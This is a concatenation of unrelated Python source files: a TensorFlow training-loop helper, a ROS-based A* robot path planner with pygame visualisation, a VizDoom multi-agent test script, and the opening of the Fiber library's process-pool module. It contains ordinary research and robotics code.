data_part = [gen_js_field_for_key_value(k, results_dict[k], True)
if k in default_show or default_show == "all"
else gen_js_field_for_key_value(k, results_dict[k], False)
for k in sorted(results_dict.keys())]
all_filled_lines = first_part + imports_part + post_imports_part
all_filled_lines = all_filled_lines + data_part + log_part
# add logging output
tmp = copy.copy(string_f)
tmp.seek(0)
log_output = tmp.readlines()
del tmp
all_filled_lines = all_filled_lines + log_output + last_part
return all_filled_lines
def save_results_as_html(save_path, results_dict, use_checkpoint_dir=True,
default_no_show="_auto", latest_tag=None):
show_keys = [k for k in results_dict.keys()
if default_no_show not in k]
as_html = filled_js_template_from_results_dict(
results_dict, default_show=show_keys)
if use_checkpoint_dir:
save_path = os.path.join(get_checkpoint_dir(), save_path)
logger.info("Saving HTML results %s" % save_path)
with open(save_path, "w") as f:
f.writelines(as_html)
if latest_tag is not None:
latest_path = os.path.join(get_checkpoint_dir(), latest_tag + "_latest.html")
if os.path.exists(latest_path):
os.remove(latest_path)
os.symlink(save_path, latest_path)
logger.info("Completed HTML results saving %s" % save_path)
@coroutine
def threaded_html_writer(interp=True, maxsize=25):
"""
Expects to be sent a tuple of (save_path, results_dict)
"""
messages = Queue.PriorityQueue(maxsize=maxsize)
def run_thread():
while True:
p, item = messages.get()
if item is GeneratorExit:
return
else:
save_path, results_dict = item
save_results_as_html(save_path, results_dict)
threading.Thread(target=run_thread).start()
try:
n = 0
while True:
item = (yield)
messages.put((n, item))
n -= 1
except GeneratorExit:
messages.put((1, GeneratorExit))
def run_loop(sess,
train_loop_function, train_itr,
valid_loop_function, valid_itr,
n_steps=np.inf,
n_train_steps_per=1000,
train_stateful_args=None,
n_valid_steps_per=50,
valid_stateful_args=None,
checkpoint_frequency=1000,
status_every_s=5,
models_to_keep=5):
"""
if restore_model:
model_file = tf.train.latest_checkpoint(os.path.join(restore_model, 'models'))
experiment_path = restore_model
epoch = int(model_file.split('-')[-1]) + 1
model_saver.restore(sess, model_file)
"""
sess.run(tf.global_variables_initializer())
write_tfbldr_lookup_file()
archive_tfbldr()
script = get_script()
hostname = socket.gethostname()
logger.info("Host %s, script %s" % (hostname, script))
train_itr_steps_taken = 0
valid_itr_steps_taken = 0
overall_train_loss = []
overall_valid_loss = []
# won't match exactly due to this - even after replaying itr stateful args may change
# however, should be *close* since data is at least iterated in the same way...
this_train_stateful_args = copy.deepcopy(train_stateful_args)
this_valid_stateful_args = copy.deepcopy(valid_stateful_args)
last_status = time.time()
model_saver = tf.train.Saver(max_to_keep=models_to_keep)
train_best_model_saver = tf.train.Saver(max_to_keep=models_to_keep)
valid_best_model_saver = tf.train.Saver(max_to_keep=models_to_keep)
checkpoint_dir = get_checkpoint_dir()
thw = threaded_html_writer()
cumulative_train_time = []
minibatch_train_time = []
minibatch_train_count = []
cumulative_valid_time = []
minibatch_valid_time = []
minibatch_valid_count = []
min_last_train_loss = np.inf
min_valid_loss = np.inf
was_best_valid_loss = False
while True:
# stop at the start of an epoch
if train_itr_steps_taken + 1 >= n_steps:
break
extras = {}
extras["train"] = True
assert n_train_steps_per >= 1
this_train_loss = []
train_start_time = time.time()
for tsi in range(n_train_steps_per):
s = time.time()
r = train_loop_function(sess, train_itr, extras, this_train_stateful_args)
e = time.time()
if train_stateful_args is not None:
this_train_stateful_args = r[-1]
train_loss = r[0]
# use the first loss returned to do train best checkpoint
if not hasattr(train_loss, "__len__"):
all_train_loss = [train_loss]
else:
all_train_loss = train_loss
train_loss = all_train_loss[0]
# should only happen for first mb of each epoch
if len(this_train_loss) < len(all_train_loss):
for i in range(len(all_train_loss)):
this_train_loss.append([])
# should only happen for first epoch
if len(overall_train_loss) < len(all_train_loss):
for i in range(len(all_train_loss)):
overall_train_loss.append([])
for i in range(len(all_train_loss)):
this_train_loss[i].append(all_train_loss[i])
minibatch_time = e - s
train_time_accumulator = 0 if len(cumulative_train_time) == 0 else cumulative_train_time[-1]
cumulative_train_time.append(minibatch_time + train_time_accumulator)
minibatch_train_time.append(minibatch_time)
train_summary = r[1]
train_itr_steps_taken += 1
minibatch_train_count.append(train_itr_steps_taken)
            if (tsi + 1) == n_train_steps_per or (time.time() - last_status) > status_every_s:
logger.info("train step {}/{}, overall train step {}".format(tsi + 1, n_train_steps_per, train_itr_steps_taken))
for n, tl in enumerate(all_train_loss):
logger.info("train loss {} {}, overall train average {}".format(n + 1, tl, np.mean(overall_train_loss[n] + this_train_loss[n])))
logger.info(" ")
last_status = time.time()
for i in range(len(this_train_loss)):
overall_train_loss[i] += this_train_loss[i]
if train_loss < min_last_train_loss:
min_last_train_loss = train_loss
logger.info("had best train, step {}".format(train_itr_steps_taken))
train_best_model_saver.save(sess, os.path.join(checkpoint_dir, "models", "train_model"),
global_step=train_itr_steps_taken)
extras["train"] = False
if n_valid_steps_per > 0:
this_valid_loss = []
valid_start_time = time.time()
for vsi in range(n_valid_steps_per):
s = time.time()
r = valid_loop_function(sess, valid_itr, extras, this_valid_stateful_args)
e = time.time()
if valid_stateful_args is not None:
this_valid_stateful_args = r[-1]
valid_loss = r[0]
if not hasattr(valid_loss, "__len__"):
all_valid_loss = [valid_loss]
else:
all_valid_loss = valid_loss
valid_loss = all_valid_loss[0]
# should only happen for first mb of each epoch
if len(this_valid_loss) < len(all_valid_loss):
for i in range(len(all_valid_loss)):
this_valid_loss.append([])
# should only happen for first epoch
if len(overall_valid_loss) < len(all_valid_loss):
for i in range(len(all_valid_loss)):
overall_valid_loss.append([])
for i in range(len(all_valid_loss)):
this_valid_loss[i].append(all_valid_loss[i])
if valid_loss < min_valid_loss:
min_valid_loss = valid_loss
was_best_valid_loss = True
minibatch_time = e - s
valid_time_accumulator = 0 if len(cumulative_valid_time) == 0 else cumulative_valid_time[-1]
cumulative_valid_time.append(minibatch_time + valid_time_accumulator)
minibatch_valid_time.append(minibatch_time)
valid_summary = r[1]
valid_itr_steps_taken += 1
minibatch_valid_count.append(valid_itr_steps_taken)
                if (vsi + 1) == n_valid_steps_per or (time.time() - last_status) > status_every_s:
logger.info("valid step {}/{}, overall valid step {}".format(vsi + 1, n_valid_steps_per, valid_itr_steps_taken))
for n, vl in enumerate(all_valid_loss):
logger.info("valid loss {} {}, overall valid average {}".format(n, vl, np.mean(overall_valid_loss[n] + this_valid_loss[n])))
logger.info(" ")
last_status = time.time()
for i in range(len(this_valid_loss)):
valid_interpd = [vi for vi in np.interp(np.arange(len(this_train_loss[i])), np.arange(len(this_valid_loss[i])), this_valid_loss[i])]
overall_valid_loss[i] += valid_interpd
        if train_itr_steps_taken > 1E9:
            save_html_path = "model_step_{}m.html".format(train_itr_steps_taken // 1E6)
        elif train_itr_steps_taken > 1E6:
            save_html_path = "model_step_{}k.html".format(train_itr_steps_taken // 1E3)
        else:
            save_html_path = "model_step_{}.html".format(train_itr_steps_taken)
results_dict = {}
for i in range(len(overall_train_loss)):
results_dict["train_loss_{}".format(i)] = overall_train_loss[i]
results_dict["train_minibatch_time_auto"] = minibatch_train_time
results_dict["train_cumulative_time_auto"] = cumulative_train_time
results_dict["train_minibatch_count_auto"] = minibatch_train_count
# shortcut "and" to avoid edge case with no validation steps
if len(overall_valid_loss) > 0 and len(overall_valid_loss[0]) > 0:
for i in range(len(overall_valid_loss)):
results_dict["valid_loss_{}".format(i)] = overall_valid_loss[i]
results_dict["valid_minibatch_time_auto"] = minibatch_valid_time
results_dict["valid_cumulative_time_auto"] = cumulative_valid_time
results_dict["valid_minibatch_count_auto"] = minibatch_valid_count
thw.send((save_html_path, results_dict))
model_saver.save(sess, os.path.join(checkpoint_dir, "models", "model"),
global_step=train_itr_steps_taken)
if was_best_valid_loss:
logger.info("had best valid, step {}".format(train_itr_steps_taken))
valid_best_model_saver.save(sess, os.path.join(checkpoint_dir, "models", "valid_model"),
global_step=train_itr_steps_taken)
was_best_valid_loss = False
extras["train"] = True
logger.info("Training complete, exiting...")
|
decision3.py
|
#!/usr/bin/env python
#-*- coding:UTF-8 -*-
import math
import pygame
import time
import sensor_msgs.point_cloud2 as pc2
from sensor_msgs.msg import PointCloud2
import rospy
from geometry_msgs.msg import Twist
import threading
from nav_msgs.msg import Odometry
# Global constants: pixel size of each node (cell) in the map
CELL_WIDTH = 12  # cell width
CELL_HEIGHT = 12  # cell height
BORDER_WIDTH = 0.5  # border width
REFLESH = 0.1  # loop refresh period (seconds)
MAPSIZE = 60  # window size (in cells)
SCALE = 0.2  # scaling factor
MAXRANK = 3  # maximum memory duration (number of update cycles)
class Color(object):
"""
定义颜色
"""
GRID = (190, 235, 243)
OBJECT = (65, 20, 243)
END = (255, 0, 0)
ROUTE = (255, 0, 0)
BLOCK = (0, 0, 0)
class Map(object):
def __init__(self, mapsize):
self.mapsize = mapsize
def generate_cell(self, cell_width, cell_height):
"""
定义一个生成器,用来生成地图中的所有节点坐标
:param cell_width: 节点宽度
:param cell_height: 节点长度
:return: 返回地图中的节点
"""
x_cell = -cell_width
for num_x in range(self.mapsize[0] // cell_width):
y_cell = -cell_height
x_cell += cell_width
for num_y in range(self.mapsize[1] // cell_height):
y_cell += cell_height
yield (x_cell, y_cell)
def transform(pos):
xnew, ynew = pos[0]*CELL_WIDTH, pos[1]*CELL_HEIGHT
return xnew, ynew
def floor_tuple(scale, pos=tuple()):
"""
将点云数据转换成适合的数据格式
:param scale: 缩放比例
:param pos: 未经离散化的连续型坐标
:return: 缩放、离散化以后的连续型坐标
"""
x = float(pos[0]/scale)
y = float(pos[1]/scale)
return tuple((math.floor(x), math.floor(y)))
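# Hedged example (values are illustrative assumptions):
#   floor_tuple(0.2, (1.05, -0.3)) -> (5, -2)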
class Block(object):
def __init__(self, pos):
self.pos = pos
self.rank = 0
def update(self):
self.rank = self.rank+1
class Blocklist(object):
"""
Blocklist类,接收来自点云的数据,离散化为一组元组,代表A*中的blocklist
2021.4.9更新:
Blocklist类新增记忆前三此点云数据功能,达到稳定点云图的目的。
为此新增Block类,作为blocklist中的基本元素元素。
包含两个值:pos-->坐标
rank-->等级[1,3],当rank>3时,将之从Blocklist中删除
Block类如上。
"""
def __init__(self, scale, point_cloud_data, pre_blocks, pre_blocklist, maxrank):
"""
初始化类,此类应该包含几个参数:
:param scale: 缩放比例
:param point_cloud_data: 原始点云数据
:param pre_blocks: 上一次处理后的blocks(由block组成)列表
:param pre_blocklist: 上一次处理后的blocklist(由block.pos组成)列表
:param maxrank 最长记忆时间(单位:次)
"""
self.scale = scale
self.maxrank = maxrank
self.pcd = point_cloud_data
        self.now_blocks = pre_blocks  # will end up as the merge of this frame's point cloud and pre_blocks
        self.now_blocklist = pre_blocklist  # will end up as the merge of this frame's point cloud and pre_blocklist
def pcd_discretization(self):
"""
2021.4.9更新:
为了达到本次更新所达到的效果,将此函数新增刷新block.rank、删除block功能
:return: 形式正确的now_blocklist
"""
# 添加,更新:
for tmp1 in self.pcd:
            block_pos = floor_tuple(self.scale, tmp1)  # TODO: improve the discretization function
            # blocklist here is just for convenient lookups; it is ultimately rebuilt from the blocks
if block_pos not in self.now_blocklist:
self.now_blocklist.append(block_pos)
block = Block(block_pos)
self.now_blocks.append(block)
else:
for i in range(len(self.now_blocks)):
if self.now_blocks[i].pos == block_pos:
self.now_blocks[i].rank = 0
        # Refresh and delete
n = len(self.now_blocks)
tmp2 = 0
while tmp2 < n:
try:
self.now_blocks[tmp2].update()
except KeyError:
break
            # this try/except is actually redundant
if self.now_blocks[tmp2].rank > self.maxrank:
del self.now_blocks[tmp2]
tmp2 -= 1
n -= 1
tmp2 += 1
        # rebuild the blocklist
self.now_blocklist = list()
for tmp3 in self.now_blocks:
self.now_blocklist.append(tmp3.pos)
return self.now_blocklist, self.now_blocks
# return list(map(lambda x: floor_tuple(self.scale, x), self.pcd))
        # Two approaches: one ignores duplicates, the other accounts for them
@staticmethod
def clean(blocklist):
"""
这个函数没有实际意义,单纯就是为了可视化的时候block不会出现在(0,0)
"""
tmp = tuple((0, 0))
n = len(blocklist)
i = 0
while i < n:
if blocklist[i] == tmp:
del blocklist[i]
n = n-1
i = i-1
i += 1
return blocklist
        # s = 0  # purely to verify that the preceding algorithm is correct
# for x in blocklist:
# if x == tmp:
# s = s + 1
# print(s)
# return blocklist
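# Hedged usage sketch of the Blocklist memory mechanism described above
# (the point value is an illustrative assumption):
#
#   bl = Blocklist(SCALE, [(1.0, 0.4)], pre_blocks=[], pre_blocklist=[],
#                  maxrank=MAXRANK)
#   blocklist, blocks = bl.pcd_discretization()   # blocklist -> [(5, 2)]
#   # a cell is dropped once it has gone unseen for more than maxrank updates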
class Visualization(object):
"""
    Point cloud visualization.
    The tool's built-in visualization does not quite meet the project's needs, so this is a rewrite.
"""
def __init__(self, blocklist, pos_now, pos_end, mapsize, routelist):
self.pos_now, self.pos_end, self.blocklist, self.routelist, self.mapsize = self.change_xy(pos_now,
pos_end,
blocklist,
routelist,
mapsize)
@staticmethod
def draw(mymap, screen, bl_pix, pix_now, pix_end, ro_pix):
        # Draw every cell on the screen
for (x, y) in mymap.generate_cell(CELL_WIDTH, CELL_HEIGHT):
if (x, y) in bl_pix:
                # Draw a black obstacle cell, leaving a 2-pixel border
pygame.draw.rect(screen, Color.BLOCK,
((x+BORDER_WIDTH, y+BORDER_WIDTH),
(CELL_WIDTH-2*BORDER_WIDTH, CELL_HEIGHT-2*BORDER_WIDTH))
)
elif (x, y) in ro_pix:
                # Draw the planned route
pygame.draw.rect(screen, Color.ROUTE,
((x+BORDER_WIDTH, y+BORDER_WIDTH),
(CELL_WIDTH-2*BORDER_WIDTH, CELL_HEIGHT-2*BORDER_WIDTH))
)
else:
                # Draw a traversable cell, leaving a 2-pixel border
pygame.draw.rect(screen, Color.GRID,
((x+BORDER_WIDTH, y+BORDER_WIDTH),
(CELL_WIDTH-2*BORDER_WIDTH, CELL_HEIGHT-2*BORDER_WIDTH))
)
pygame.draw.circle(screen, Color.OBJECT,
(int(pix_now[0])+int(CELL_WIDTH//2), int(pix_now[1])+int(CELL_HEIGHT//2)), int(CELL_WIDTH//2) - 1)
pygame.draw.circle(screen, Color.END,
(int(pix_end[0])+int(CELL_WIDTH//2), int(pix_end[1])+int(CELL_HEIGHT//2)), int(CELL_WIDTH//2) - 1)
pygame.display.flip()
@staticmethod
def change_xy(pos_now, pos_end, blocklist, routelist, mapsize=50):
        # The previous visualization only showed the first quadrant; it now shows all four quadrants, with the initial origin at (25, 25)
mapsize = mapsize + 2
tmp = math.floor(mapsize/2)-1
        pos_now = tuple((tmp+pos_now[0], tmp+pos_now[1]))
pos_end = tuple((tmp+pos_end[0], tmp+pos_end[1]))
blocklist = list(map(lambda block: tuple((tmp+block[0], tmp+block[1])), blocklist))
routelist = list(map(lambda route: tuple((tmp+route[0], tmp+route[1])), routelist))
return pos_now, pos_end, blocklist, routelist, mapsize
def visual(self):
        # Initialize the pygame module
pygame.init()
        # Convert the map's projected size into pixels; each map cell is CELL_WIDTH*CELL_HEIGHT pixels
mymap = Map((self.mapsize*CELL_WIDTH, self.mapsize*CELL_HEIGHT))
        # Initialize the display window and set its size
screen = pygame.display.set_mode((self.mapsize*CELL_WIDTH, self.mapsize*CELL_HEIGHT))
t_end = time.time() + REFLESH
while time.time() < t_end:
pygame.display.set_caption('example:')
            bl_pix = list(map(transform, self.blocklist))  # convert to pixels
ro_pix = list(map(transform, self.routelist))
pix_now = (self.pos_now[0]*CELL_WIDTH, self.pos_now[1]*CELL_HEIGHT)
pix_end = (self.pos_end[0]*CELL_WIDTH, self.pos_end[1]*CELL_HEIGHT)
self.draw(mymap, screen, bl_pix, pix_now, pix_end, ro_pix)
class Node(object):
"""
    Node type. Each Node instance contains:
    1. the node position pos = (x, y)
    2. gvalue = g(x), the minimum actual distance from the start to the current node CNode
    3. fvalue = f(x), the objective function in the current state
    4. the position of the node's parent
    -- plus the helper functions related to the data above
    """  # TODO: rewrite the objective function formula to find the optimal solution
def __init__(self, pos):
self.pos = pos
self.father = None
self.gvalue = 0
self.fvalue = 0
def compute_fx(self, enode, father):
if not father:
print('??')
gx_father = father.gvalue # g'(n1)
        # Euclidean distance from the parent node to the current node, d(n1, n2)
        gx_f2n = math.sqrt((father.pos[0] - self.pos[0])**2 + (father.pos[1] - self.pos[1])**2)
        gvalue = gx_f2n + gx_father  # for the child node, g(n2) = g(n1) + d(n1, n2)
        # Euclidean distance from this node to the goal, h(n2)
        hx_n2enode = math.sqrt((self.pos[0] - enode.pos[0])**2 + (self.pos[1] - enode.pos[1])**2)
        fvalue = gvalue + hx_n2enode  # f(n2) = g(n2) + h(n2)
return gvalue, fvalue
def set_fx(self, enode, father):
self.gvalue, self.fvalue = self.compute_fx(enode, father)
self.father = father
def update_fx(self, enode, father):
gvalue, fvalue = self.compute_fx(enode, father)
if fvalue < self.fvalue:
self.gvalue, self.fvalue = gvalue, fvalue
self.father = father
class AStar(object):
"""
    AStar class, holding the main routine of the A* algorithm.
    Inputs:
    1. map size (n*m)
    2. current position (x, y) -- originally the "start position", changed to the current position
    3. goal position (x, y)
    There is also an implicit input: the obstacle coordinates.
    Outputs and intermediate variables:
    1. openlist: candidate nodes around the current node  TODO: possible issue here, may not fulfil the original goal of "predicting the path"
    2. closelist: already planned nodes, i.e. the optimal path found so far
    3. blocklist: obstacle coordinates
"""
def __init__(self, mapsize, pos_now, pos_en):
        self.mapsize = mapsize  # projected map size (n*n), not the on-screen pixel size
self.openlist, self.closelist, self.blocklist = [], [], []
        # openlist: nodes waiting to be searched
        # closelist: nodes already planned
        # blocklist: obstacle nodes
        self.snode = Node(pos_now)  # the current node
        self.enode = Node(pos_en)  # the goal node of the path planning
        self.cnode = self.snode  # the node currently being expanded
        # for the first iteration this just means the start node is added
    def run(self):  # main pathfinding routine
self.openlist.append(self.snode)
while len(self.openlist) > 0:
            # Find the node with the smallest fx in openlist; fxlist holds the objective values of all candidate nodes
            # The start node's objective fx is defined to be 0
fxlist = list(map(lambda x: x.fvalue, self.openlist))
            # The lambda returns the objective value of x; map applies it to each x (a Node object holding all of its own information)
            # map takes a function as its first argument and one or more iterables after it,
            # pulling elements from them in order, passing them to the function, and returning an iterator (without changing the element types)
            # (roughly)
            index_min = fxlist.index(min(fxlist))  # index of the smallest objective value in fxlist
            self.cnode = self.openlist[index_min]  # openlist and fxlist correspond one-to-one, so this is also the index of that node
            del self.openlist[index_min]  # remove the index_min node from openlist
            self.closelist.append(self.cnode)  # add the index_min node to closelist
            # Expand the node with the smallest fx and continue searching in the next iteration
self._extend(self.cnode)
            # Break when openlist is empty or the current node is the goal node
if len(self.openlist) == 0 or self.cnode.pos == self.enode.pos:
break
if self.cnode.pos == self.enode.pos:
self.enode.father = self.cnode.father
            return self.closelist[1]  # return the next position to move to
else:
            return -1  # stay put
def get_minroute(self):
minroute = list()
current_node = self.enode
while True:
minroute.append(current_node.pos)
            current_node = current_node.father  # like Dijkstra, recover the path by following parent nodes
            if current_node.pos == self.snode.pos:  # reached the root node
minroute.append(current_node.pos)
break
        # minroute.put(self.snode.pos)  # add the start node -- not needed for now
return minroute
    def _extend(self, cnode):  # add neighbors of the current best node that are not in closelist or blocklist into openlist
nodes_neighbor = self.get_neighbor(cnode)
for node in nodes_neighbor:
            # Check whether node is in closelist or blocklist; closelist holds Node objects, so use map to convert them to coordinates first
if node.pos in list(map(lambda x: x.pos, self.closelist)) or node.pos in self.blocklist:
continue
else:
if node.pos in list(map(lambda x: x.pos, self.openlist)):
node.update_fx(self.enode, cnode)
else:
node.set_fx(self.enode, cnode)
self.openlist.append(node)
def setblock(self, blocklist):
"""
        Collect the map's obstacle nodes and store them in the self.blocklist list.
        Note: self.blocklist stores obstacle coordinates, not Node objects.
"""
self.blocklist = list()
self.blocklist.extend(blocklist)
@staticmethod
def get_neighbor(cnode):
        # offsets = [(-1, 1), (0, 1), (1, 1), (-1, 0), (1, 0), (-1, -1), (0, -1), (1, -1)]  # 8-connected
        offsets = [(-1, 0), (0, 1), (1, 0), (0, -1)]  # 4-connected
nodes_neighbor = []
x, y = cnode.pos[0], cnode.pos[1]
        for offset in offsets:
            x_new, y_new = x + offset[0], y + offset[1]
pos_new = (x_new, y_new)
            # Check whether the position is inside the map; positions out of range should be skipped
nodes_neighbor.append(Node(pos_new))
return nodes_neighbor
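# Hedged usage sketch (coordinates are illustrative assumptions, not from the
# original script):
#
#   astar = AStar(MAPSIZE, (0, 0), (10, 0))
#   astar.setblock([(3, 0), (3, 1)])
#   next_node = astar.run()         # -1 if no path was found, else the next Node
#   route = astar.get_minroute()    # positions from the goal back to the start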
def give_start_and_end():
return tuple((0, 0)), tuple((40, 0)),
def vx_vy(pos_now, pos_next):
e = tuple((pos_next[1]-pos_now[1], pos_next[0]-pos_now[0]))
d = math.sqrt(e[0]**2+e[1]**2)
e = tuple((e[0]/d, e[1]/d))
vx = e[0]
vy = e[1]
return vx, vy
def check(blocklist, routelist):
for block in blocklist:
if block in routelist:
return -1
return 1
def moving():
while True:
pose_now = rospy.wait_for_message("/Odom",Odometry,timeout=rospy.Duration(3.0))
        # publish motion commands according to routelist
def programming(n_bl, n_b, routelist):
mapsize = MAPSIZE
pos_now, pos_end = give_start_and_end()
pcl_raw = rospy.wait_for_message("/PointClouds", PointCloud2, timeout=rospy.Duration(3.0))
pcd = pc2.read_points_list(pcl_raw, field_names=("x", "y"), skip_nans=True)
create_block = Blocklist(SCALE, pcd, n_b, n_bl, maxrank=MAXRANK)
n_bl, n_b = create_block.pcd_discretization()
if len(routelist) == 0 or check(n_bl, routelist) == -1:
        myastar = AStar(mapsize, pos_now, pos_end)  # initialize the planner class
myastar.setblock(n_bl)
myastar.run()
routelist = myastar.get_minroute()
vis = Visualization(n_bl, pos_now, pos_end, mapsize=mapsize, routelist=routelist)
vis.visual()
return n_bl, n_b, routelist
def main():
# if init:
# pcl_raw = rospy.wait_for_message("/ObstaclePoints",PointCloud2,timeout=rospy.Duration(3.0))
# pcd_last = pc2.read_points_list(pcl_raw,field_names=("x","y"),skip_nans=True)
# else:
pass
if __name__ == "__main__":
now_blocklist = list()
now_blocks = list()
now_routelist = list()
rospy.init_node("decision")
#thread1 = threading.Thread(target=moving)
# thread1.start()
while True:
now_blocklist, now_blocks, now_routelist = programming(now_blocklist, now_blocks, now_routelist)
|
test_cig_planet_vs_player.py
|
# Copyright 2019 The PlaNet Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gym
from gym_vizdoom import (LIST_OF_ENVS, EXPLORATION_GOAL_FRAME, GOAL_REACHING_REWARD)
import vizdoomgym
from multiprocessing import Process
from threading import Thread
import time
def run_agent(a_id):
print(f"making {a_id}")
env = gym.make("VizdoomCig-v0", agent_id=a_id, agents_total=2, port=5030)
env.imitation = False
policy = lambda env, obs: env.action_space.sample()
done = False
steps = 0
env.reset()
while True:
env.step(env.action_space.sample())
pass
agents = []
# host = Process(target=run_agent, args=(str(0)))
# host.start()
# player2 = Process(target=run_agent, args=(str(1)))
# player2.start()
player3 = Process(target=run_agent, args=(str(4)))
player3.start()
# run_agent(0)
input()
|
pool.py
|
#
# Module providing the `Pool` class for managing a process pool
#
# multiprocessing/pool.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
# Modifications Copyright (c) 2020 Uber Technologies
"""
*Pools* are supported by Fiber. They allow the user to manage a pool of
worker processes. Fiber extends pools with *job-backed processes* so that it
can manage thousands of (remote) workers per pool. Users can also create
multiple pools at the same time.
Fiber implements two different versions of `Pool`: `ZPool` and `ResilientZPool`.
Both have the same API as `multiprocessing.Pool`. `ZPool` is a pool based on
"r"/"w" socket pairs.
`ResilientZPool` is `ZPool` + [error handling](advanced.md#error-handling).
Failed tasks will be resubmitted to the Pool and worked on by other pool
workers.
By default, `ResilientZPool` is exposed as `fiber.Pool`.
Example:
```python
pool = fiber.Pool(processes=4)
pool.map(math.sqrt, range(10))
```
"""
import logging
import multiprocessing as mp
import multiprocessing.pool as mp_pool
import multiprocessing.util as mp_util
import pickle
import math
import queue
import random
import struct
import threading
import sys
import time
import secrets
import traceback
from multiprocessing.pool import (CLOSE, RUN, TERMINATE,
ExceptionWithTraceback, MaybeEncodingError,
ThreadPool, _helper_reraises_exception)
import fiber.queues
import fiber.config as config
from fiber.backend import get_backend
from fiber.queues import LazyZConnection
from fiber.socket import Socket
from fiber.process import current_process
import signal
logger = logging.getLogger('fiber')
MIN_PORT = 40000
MAX_PORT = 65535
def safe_join_worker(proc):
p = proc
if p.is_alive():
# worker has not yet exited
logger.debug('cleaning up worker %s' % p.pid)
p.join(5)
def safe_terminate_worker(proc):
delay = random.random()
# Randomize start time to prevent overloading the server
logger.debug(
"start multiprocessing.pool.worker terminator thread for proc %s "
"with delay %s", proc.name, delay)
time.sleep(delay)
p = proc
if p.exitcode is None:
p.terminate()
logger.debug("safe_terminate_worker() finished")
def safe_start(proc):
try:
proc.start()
proc._start_failed = False
except Exception:
msg = traceback.format_exc()
logging.warning("failed to start process %s: %s", proc.name, msg)
# Set this so that this process can be cleaned up later
proc._start_failed = True
def mp_worker_core(inqueue, outqueue, maxtasks=None, wrap_exception=False):
logger.debug('mp_worker_core running')
put = outqueue.put
get = inqueue.get
completed = 0
while maxtasks is None or (maxtasks and completed < maxtasks):
try:
task = get()
except (EOFError, OSError):
logger.debug('worker got EOFError or OSError -- exiting')
break
if task is None:
logger.debug('worker got sentinel -- exiting')
break
job, i, func, args, kwds = task
try:
result = (True, func(*args, **kwds))
except Exception as e:
if wrap_exception and func is not _helper_reraises_exception:
e = ExceptionWithTraceback(e, e.__traceback__)
result = (False, e)
try:
put((job, i, result))
except Exception as e:
wrapped = MaybeEncodingError(e, result[1])
logger.debug("Possible encoding error while sending result: %s" % (
wrapped))
put((job, i, (False, wrapped)))
task = job = result = func = args = kwds = None
completed += 1
logger.debug('worker exiting after %s tasks' % completed)
def mp_worker(inqueue, outqueue, initializer=None, initargs=(), maxtasks=None,
wrap_exception=False, num_workers=1):
"""This is mostly the same as multiprocessing.pool.worker, the difference
is that it will start multiple workers (specified by `num_workers` argument)
via multiproccessing and allow the Fiber pool worker to take multiple CPU
cores.
"""
assert maxtasks is None or (type(maxtasks) == int and maxtasks > 0)
if hasattr(inqueue, '_writer'):
inqueue._writer.close()
outqueue._reader.close()
if initializer is not None:
initializer(*initargs)
workers = []
for i in range(num_workers):
# Use fork context to make sure that imported modules and other things
# are shared. This is useful when modules share objects between
# processes.
ctx = mp.get_context('fork')
p = ctx.Process(target=mp_worker_core,
args=(inqueue, outqueue, maxtasks, wrap_exception))
p.start()
workers.append(p)
for w in workers:
w.join()
class ClassicPool(mp_pool.Pool):
@staticmethod
def Process(ctx, *args, **kwds):
return fiber.process.Process(*args, **kwds)
def __init__(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None, cluster=None):
self._ctx = None
self._setup_queues()
self._taskqueue = queue.Queue()
self._cache = {}
self._state = RUN
self._maxtasksperchild = maxtasksperchild
self._initializer = initializer
self._initargs = initargs
if processes is None:
processes = 1
if processes < 1:
raise ValueError("Number of processes must be at least 1")
if initializer is not None and not callable(initializer):
raise TypeError("initializer must be a callable")
self._processes = processes
self._pool = []
self._threads = []
self._repopulate_pool()
# Worker handler
self._worker_handler = threading.Thread(
target=ClassicPool._handle_workers,
args=(self._cache, self._taskqueue, self._ctx, self.Process,
self._processes, self._pool, self._threads, self._inqueue,
self._outqueue, self._initializer, self._initargs,
self._maxtasksperchild, self._wrap_exception)
)
self._worker_handler.daemon = True
self._worker_handler._state = RUN
self._worker_handler.start()
logger.debug(
"Pool: started _handle_workers thread(%s:%s)",
self._worker_handler.name, self._worker_handler.ident
)
# Task handler
# NOTE: Fiber socket is not thread safe. SimpleQueue is built with Fiber
# socket, so it shouldn't be shared between different threads. But
# here _quick_put and _inqueue are only accessed by _task_handler
# except when the Pool is terminated and `_terminate` is called.
self._task_handler = threading.Thread(
target=ClassicPool._handle_tasks,
args=(self._taskqueue, self._quick_put, self._outqueue,
self._pool, self._cache)
)
self._task_handler.daemon = True
self._task_handler._state = RUN
self._task_handler.start()
logger.debug(
"Pool: started _handle_tasks thread(%s:%s)",
self._task_handler.name, self._task_handler.ident
)
# Result handler
self._result_handler = threading.Thread(
target=ClassicPool._handle_results,
args=(self._outqueue, self._quick_get, self._cache)
)
self._result_handler.daemon = True
self._result_handler._state = RUN
self._result_handler.start()
logger.debug(
"Pool: started _handle_results thread(%s:%s)",
self._result_handler.name, self._result_handler.ident
)
# TODO use fiber's own weak ref
self._terminate = mp_util.Finalize(
self, self._terminate_pool,
args=(self._taskqueue, self._inqueue, self._outqueue, self._pool,
self._threads, self._worker_handler, self._task_handler,
self._result_handler, self._cache),
exitpriority=15
)
logger.debug("Pool: registered _terminate_pool finalizer")
def _setup_queues(self):
self._inqueue = fiber.queues.SimpleQueue()
logger.debug("Pool|created Pool._inqueue: %s", self._inqueue)
self._outqueue = fiber.queues.SimpleQueue()
logger.debug("Pool|created Pool._outqueue: %s", self._outqueue)
# TODO(jiale) use send_string instead?
self._quick_put = self._inqueue.put
# TODO(jiale) can't use _outqueue.reader.get because _outqueue.reader
# is a REQ socket. It can't be called consecutively.
self._quick_get = self._outqueue.get
def _map_async(self, func, iterable, mapper, chunksize=None, callback=None,
error_callback=None):
"""
Helper function to implement map, starmap and their async counterparts.
"""
if self._state != RUN:
raise ValueError("Pool not running")
if not hasattr(iterable, '__len__'):
iterable = list(iterable)
if chunksize is None:
